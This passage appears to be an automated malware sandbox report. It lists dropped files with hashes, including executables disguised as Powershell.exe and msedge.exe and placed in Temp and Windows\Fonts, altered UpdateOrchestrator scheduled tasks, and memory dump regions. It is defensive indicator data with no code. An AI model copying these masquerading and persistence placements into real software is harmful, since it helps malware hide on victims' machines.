ba6a50a07eba65ae555601491402129776a78182ef64b480ab1149dbcfe30f00

SHA512
f80fa64faee3ebc5a0812db47cd255a0da8b36c093f7339277d28d025a18cc99f52f48ef17ca90804ac7172cac6949cb329911e36c0b5af98ca08d25dea0f2ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8889d1167c69735d80e72b5d2008c857

SHA1
5470f2b51dc670ddaefba2f9420e77add2ee85c3

SHA256
8d30289408ef3f1d2fa6a1656c05f2a42d57b7b516929141fa506cc81450634e

SHA512
88bed155f6e1eea379cc2cd8d212913a791c019ecc9c226f962c704749ef3407d91bf6368efa5cbc5c81b222727eb2dbc0e6a6138b83f187e1025bd36bd7f4e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
037d47adbb4a6287669fec7b7156f670

SHA1
3a662f209e7d1d8b98835cb3e49aefa59d66beb8

SHA256
9ae7b4d6e1c20e1af47b8e4c961d41557a2b02f114b73db1be0cf2ba310f65d0

SHA512
f7fe6556010eb58cd388e1066f63981b2a396b85739f897dfb1fa81f49aeea8d95d3ee012479a39ad27e553d77c7f5cf88adf2640fa3eeebf8e4fc03176665fb

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
328B

MD5
210da48ebd99b4ceb804c5ed5ed3d76b

SHA1
e07086ff92ed0dbbf1422d0a42bbb69db9eb72a7

SHA256
c0b4d8068c2a25e7a0d22e3a92a8b3bac5511aaad04f42f61fe7a9fc5bf54966

SHA512
71986f0cec9e73127e5faa69590f653f111e5e1e2df862afcc0a0462ecd694dcfcba3c83935e2acf730e7c91521fd0d96d58cb3130a5d212b2f737d933110608

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Filesize
330B

MD5
f07c84076f63b446503c9d4b1c6df034

SHA1
775811ff8abccc89a19714c0c621abced2639081

SHA256
7c980c8b22fe8b5bb80fd2bde5c1064c659b0d13c1ff990c78018fffdb875408

SHA512
8550c4f169729a814e76db8b1158fb6f460f8cfdac4663114bdd5614e208ffe2a3fe3006a98b1c8de114ea4c178e36729f34d5a984cba6cca657d6a5c4b296e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\3D747FD0.exe

Filesize
4B

MD5
20879c987e2f9a916e578386d499f629

SHA1
c7b33ddcc42361fdb847036fc07e880b81935d5d

SHA256
9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

SHA512
bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

Download Submit
C:\Users\Admin\AppData\Local\Temp\423e4f63.bat

Filesize
189B

MD5
170e156243a8e64c24c09277418b8aed

SHA1
8cacd591b6457987af95e50e906e8cb8cad6d831

SHA256
7097ce292be6c897d4493f724082b76331f4f13a4f37fb591f1a83fb95405e11

SHA512
1177a38aab38d355a55c58055f631271d28716ff223fe1b91cb0358b5540146390d846289e542698656b9c52f925c7761817fb518c64f25d491b4e9a11d21217

Download Submit
C:\Users\Admin\AppData\Local\Temp\Powershell.exe

Filesize
290KB

MD5
c2bc8ea45567e1a6848b01a7aa7d1a1e

SHA1
7f2d331f8ff4a7a4e569269a1e566ed34c50b7e2

SHA256
738fc90cbb78c29ea1a17c4e5b3321242358cfaa996121ee952520baba2ca559

SHA512
b56097ab9be3ba6c6842e58d7fcbc8057d9a1ce09af616650cfbf4d542be5a96909dd4c59932c4ca3fd7eac6100d152065be580e1a8ae08f30ca2a9f62a1261a

Download Submit
C:\Users\Admin\AppData\Local\Temp\REHQDPN.exe

Filesize
15KB

MD5
56b2c3810dba2e939a8bb9fa36d3cf96

SHA1
99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

SHA256
4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

SHA512
27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zkzqvp5m.elj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe

Filesize
181KB

MD5
e75066cf57d49eba53fc4a093efec94c

SHA1
9bcf21bf5de90c60fbb21434a996e05b38d44d2a

SHA256
c22ca82f580854c3dc70e56392f94e4fdd95252ac326fb8606b59166b2a2a975

SHA512
8e092812b79659f28f8a8d9a403ddf36b0941cc8e014982c20f0d8529e1d69a87265b3d3abea6f8eb6cd0d1ae029ca02f51ff5610ca8fb36e8962aee51726a39

Download Submit
C:\Windows\Fonts\www.msedge.exe

Filesize
73KB

MD5
d3ed9a40bf4bc9b44e86182b3583ab1c

SHA1
3f65ae8dee550e1688a0cef35366b623eb9c5f4a

SHA256
ad08d7967ddba5fe4a250a41a7e3766fdfad49a604a70411429219910cfa1ade

SHA512
465db3c7c4d8cf6a75cdacc14f801b7dbb292b70fefb3df6e8586d4dae3f2de625ddd3d13830634b3120cfe37279a3ff0e75322808706e42146c9e2e4d22d93c

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
8abf2d6067c6f3191a015f84aa9b6efe

SHA1
98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

SHA256
ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

SHA512
c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
ceb7caa4e9c4b8d760dbf7e9e5ca44c5

SHA1
a3879621f9493414d497ea6d70fbf17e283d5c08

SHA256
98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

SHA512
1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
1e8e2076314d54dd72e7ee09ff8a52ab

SHA1
5fd0a67671430f66237f483eef39ff599b892272

SHA256
55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

SHA512
5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
memory/528-201-0x000001BC47FA0000-0x000001BC47FCC000-memory.dmp

Filesize
176KB

Download
memory/596-164-0x00007FFD0D5F0000-0x00007FFD0D600000-memory.dmp

Filesize
64KB

Download
memory/596-157-0x00000231C72A0000-0x00000231C72CC000-memory.dmp

Filesize
176KB

Download
memory/596-156-0x00000231C72A0000-0x00000231C72CC000-memory.dmp

Filesize
176KB

Download
memory/596-163-0x00000231C72A0000-0x00000231C72CC000-memory.dmp

Filesize
176KB

Download
memory/596-155-0x00000231C7270000-0x00000231C7296000-memory.dmp

Filesize
152KB

Download
memory/668-168-0x000001A44ABA0000-0x000001A44ABCC000-memory.dmp

Filesize
176KB

Download
memory/668-175-0x00007FFD0D5F0000-0x00007FFD0D600000-memory.dmp

Filesize
64KB

Download
memory/668-174-0x000001A44ABA0000-0x000001A44ABCC000-memory.dmp

Filesize
176KB

Download
memory/944-186-0x00007FFD0D5F0000-0x00007FFD0D600000-memory.dmp

Filesize
64KB

Download
memory/944-185-0x00000274FD320000-0x00000274FD34C000-memory.dmp

Filesize
176KB

Download
memory/944-179-0x00000274FD320000-0x00000274FD34C000-memory.dmp

Filesize
176KB

Download
memory/1012-196-0x000002C751220000-0x000002C75124C000-memory.dmp

Filesize
176KB

Download
memory/1012-197-0x00007FFD0D5F0000-0x00007FFD0D600000-memory.dmp

Filesize
64KB

Download
memory/1012-190-0x000002C751220000-0x000002C75124C000-memory.dmp

Filesize
176KB

Download
memory/1392-0-0x0000000074CFE000-0x0000000074CFF000-memory.dmp

Filesize
4KB

Download
memory/1392-1-0x00000000004C0000-0x0000000000522000-memory.dmp

Filesize
392KB

Download
memory/1392-2-0x0000000000F20000-0x0000000000F26000-memory.dmp

Filesize
24KB

Download
memory/1392-6-0x000000000E250000-0x000000000E7F4000-memory.dmp

Filesize
5.6MB

Download
memory/1392-55-0x0000000074CF0000-0x00000000754A0000-memory.dmp

Filesize
7.7MB

Download
memory/1392-4-0x000000000DAE0000-0x000000000DB60000-memory.dmp

Filesize
512KB

Download
memory/1392-8-0x00000000029D0000-0x00000000029D6000-memory.dmp

Filesize
24KB

Download
memory/1392-48-0x0000000074CFE000-0x0000000074CFF000-memory.dmp

Filesize
4KB

Download
memory/1392-5-0x000000000DC00000-0x000000000DC9C000-memory.dmp

Filesize
624KB

Download
memory/1392-7-0x000000000DCA0000-0x000000000DD32000-memory.dmp

Filesize
584KB

Download
memory/1392-9-0x0000000005090000-0x000000000509A000-memory.dmp

Filesize
40KB

Download
memory/1392-81-0x0000000074CF0000-0x00000000754A0000-memory.dmp

Filesize
7.7MB

Download
memory/1392-3-0x0000000074CF0000-0x00000000754A0000-memory.dmp

Filesize
7.7MB

Download
memory/2832-145-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2832-143-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2832-152-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2832-151-0x00007FFD4CD00000-0x00007FFD4CDBE000-memory.dmp

Filesize
760KB

Download
memory/2832-144-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2832-149-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2832-142-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2832-150-0x00007FFD4D570000-0x00007FFD4D765000-memory.dmp

Filesize
2.0MB

Download
memory/2848-141-0x00007FFD4CD00000-0x00007FFD4CDBE000-memory.dmp

Filesize
760KB

Download
memory/2848-140-0x00007FFD4D570000-0x00007FFD4D765000-memory.dmp

Filesize
2.0MB

Download
memory/2848-139-0x00000291FD120000-0x00000291FD14A000-memory.dmp

Filesize
168KB

Download
memory/2884-67-0x0000019F91510000-0x0000019F91532000-memory.dmp

Filesize
136KB

Download
memory/3160-115-0x0000000000C20000-0x0000000000C51000-memory.dmp

Filesize
196KB

Download
memory/3160-123-0x0000000000C20000-0x0000000000C51000-memory.dmp

Filesize
196KB

Download
memory/3228-120-0x0000000000740000-0x0000000000749000-memory.dmp

Filesize
36KB

Download
memory/3228-1131-0x0000000000740000-0x0000000000749000-memory.dmp

Filesize
36KB

Download
memory/4732-94-0x0000000000FD0000-0x0000000000FE8000-memory.dmp

Filesize
96KB

Download
memory/4900-64-0x0000000000210000-0x000000000025E000-memory.dmp

Filesize
312KB

Download
memory/4900-63-0x00007FFD2E353000-0x00007FFD2E355000-memory.dmp

Filesize
8KB

Download
memory/5000-50-0x0000000007410000-0x0000000007421000-memory.dmp

Filesize
68KB

Download
memory/5000-45-0x0000000007850000-0x0000000007ECA000-memory.dmp

Filesize
6.5MB

Download
memory/5000-54-0x0000000007530000-0x0000000007538000-memory.dmp

Filesize
32KB

Download
memory/5000-10-0x0000000004910000-0x0000000004946000-memory.dmp

Filesize
216KB

Download
memory/5000-11-0x0000000074CF0000-0x00000000754A0000-memory.dmp

Filesize
7.7MB

Download
memory/5000-58-0x0000000074CF0000-0x00000000754A0000-memory.dmp

Filesize
7.7MB

Download
memory/5000-53-0x0000000007550000-0x000000000756A000-memory.dmp

Filesize
104KB

Download
memory/5000-52-0x0000000007450000-0x0000000007464000-memory.dmp

Filesize
80KB

Download
memory/5000-51-0x0000000007440000-0x000000000744E000-memory.dmp

Filesize
56KB

Download
memory/5000-13-0x0000000074CF0000-0x00000000754A0000-memory.dmp

Filesize
7.7MB

Download
memory/5000-49-0x0000000007490000-0x0000000007526000-memory.dmp

Filesize
600KB

Download
memory/5000-47-0x0000000007280000-0x000000000728A000-memory.dmp

Filesize
40KB

Download
memory/5000-46-0x0000000007210000-0x000000000722A000-memory.dmp

Filesize
104KB

Download
memory/5000-44-0x0000000007120000-0x00000000071C3000-memory.dmp

Filesize
652KB

Download
memory/5000-43-0x0000000074CF0000-0x00000000754A0000-memory.dmp

Filesize
7.7MB

Download
memory/5000-30-0x00000000064A0000-0x00000000064D2000-memory.dmp

Filesize
200KB

Download
memory/5000-31-0x0000000070A50000-0x0000000070A9C000-memory.dmp

Filesize
304KB

Download
memory/5000-34-0x0000000074CF0000-0x00000000754A0000-memory.dmp

Filesize
7.7MB

Download
memory/5000-42-0x0000000006480000-0x000000000649E000-memory.dmp

Filesize
120KB

Download
memory/5000-29-0x0000000005F10000-0x0000000005F5C000-memory.dmp

Filesize
304KB

Download
memory/5000-28-0x0000000005EE0000-0x0000000005EFE000-memory.dmp

Filesize
120KB

Download
memory/5000-23-0x00000000058A0000-0x0000000005BF4000-memory.dmp

Filesize
3.3MB

Download
memory/5000-15-0x0000000004F90000-0x0000000004FF6000-memory.dmp

Filesize
408KB

Download
memory/5000-17-0x0000000074CF0000-0x00000000754A0000-memory.dmp

Filesize
7.7MB

Download
memory/5000-16-0x00000000056B0000-0x0000000005716000-memory.dmp

Filesize
408KB

Download
memory/5000-14-0x0000000004DF0000-0x0000000004E12000-memory.dmp

Filesize
136KB

Download
memory/5000-12-0x0000000005010000-0x0000000005638000-memory.dmp

Filesize
6.2MB

Download